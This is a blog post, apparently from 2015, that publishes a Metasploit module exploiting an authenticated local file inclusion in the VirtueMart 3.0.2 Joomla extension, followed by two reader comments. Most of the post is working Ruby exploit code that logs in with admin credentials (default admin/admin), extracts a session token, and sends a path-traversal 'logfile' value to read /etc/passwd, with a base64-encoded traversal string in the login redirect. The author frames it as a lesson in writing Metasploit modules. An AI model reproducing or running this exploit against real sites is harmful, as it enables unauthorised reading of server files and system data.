Monday 12 January 2015

[EN] VirtueMart 3 - LFI for Metasploit

Regarding to last few posts, below you can find another small poc exploit for LFI vulnerability found in latest (this time) VirtueMart (3.0.2).

Because it's for Joomla again, again it's based on HikaShop LFI poc.

Enjoy:

Preparing to exploit...

Raw results

And the code:
---<virtuemart_auth_lfi.rb>---

root@kali:/var/www# cat virtuemart_lfi.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'VirtueMart 3 - LFI poc for authenticated users',
        'Description' => %q{
                VirtueMart 3.0.2 is vulnerable to local file include attack.
                Authenticated user can read local files from the server.

                More here: https://twitter.com/HauntITBlog
      },
      'Author' =>
        [
          'HauntIT Blog', # Discovery
                                                  # MSF module (based on http://hauntit.blogspot.com/2015/01/en-hikashop-lfi-metasploit-module.html)
          'http://hauntit.blogspot.com'
        ],
      'License' => MSF_LICENSE,
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Targets' =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => ' 23.12.2014'))
      register_options(
      [
        OptString.new('TARGETURI', [ true, "Base Joomla directory path", 'joomla']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", 'admin']),
      ], self.class)
    end

  def check
  end

  def fetchMd5(my_string)
    if my_string  =~ /([0-9a-fA-F]{32})/
      return $1
    end
    return nil
  end


  def exploit
    # 1st, we will get cookies and token
    req1 = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php')
    })
    cookies = req1['set-cookie']
    if not req1
      fail_with("[-] Failed with 1st request")
    end

    print_status("[+] Good: " + req1.code.to_s)
    print_good("[+] Got cookie(s): " + cookies)

    token_pattern = /(<input type=\"hidden\" name=\"[a-zA-Z0-9]*\" value=\"1\")/
    if req1.body =~ token_pattern
      token = fetchMd5(req1.body)
      print_good("[+] Got token: "+ token.to_s)
    else
      print_status("[-] Token not found")
    end


    # now we need to do auth using that token and cookies
    print_status("[+] Trying to auth...")

    auth = send_request_cgi({
        'method'        => 'POST',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'cookie'        => cookies,
        'vars_post'     => {
                'username'      => datastore['USERNAME'],
                'passwd'        => datastore['PASSWORD'],
                'option'        => 'com_login',
                'task'          => 'login',
                'return'        => 'aW5kZXgucGhwP29wdGlvbj1jb21fdmlydHVlbWFydCZ2aWV3PWxvZyZ0YXNrPWVkaXQmbG9nZmlsZT0uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi8uLi9ldGMvcGFzc3dk',
                token.to_s => 1
      }
    })

    print_good("[+] Code after auth: " + auth.code.to_s)


    # 3rd step: get + post params to lfi
    print_good('[+] Exploit...')
    readthis =  "../../../../../../../../../../../../../../../../../../etc/passwd"

    xpl = send_request_cgi({
        'method'        => 'GET',
        'uri'           => normalize_uri(target_uri.path,'administrator','index.php'),
        'vars_get'      => {
                 'option'   => 'com_virtuemart',
                 'view'  => 'log',
                 'task'  => 'edit',
                 'logfile'    => readthis
        },
        'cookie'        => cookies
    })

    if xpl
      print_good("[+] Exploit response code: " + xpl.code.to_s)
      print_good("[+] Response body after attack:")
      print_status(xpl.body)
    else
      fail_with("[-] Cannot exploit it :C")
    end
  end # exploit

end

---<virtuemart_auth_lfi.rb>---

Pastebin version is here.


Cheers,
o/

2 comments:

  1. To be clear, you have to know the administrator username and password of the site in order to be able to carry this out. But if you already know these then you can do pretty much anything you want with the site anyway, eg add your own php code to the template to include any file you want, so why do you need to do things this way. It is hard to see why you think this is a real exploit.

    ReplyDelete
  2. Hi, first of all: thanks for watching. Ad. your comment: yes, you need admin's credentials to exploit this vulnerability, yes, you can add your own PHP code to templates as well (when you have those credentials). In some CMSs, probably you can even run SQL query directly from the webapp... but :) This post is not about super cool & advanced new hacking extreem technique. This post was published to help guys to learn how to write your own modules for Metasploit. That's all. And that's why vulnerability exploited by this poc code was described here - it's a nice example. Cheers.

    ReplyDelete

What do You think...?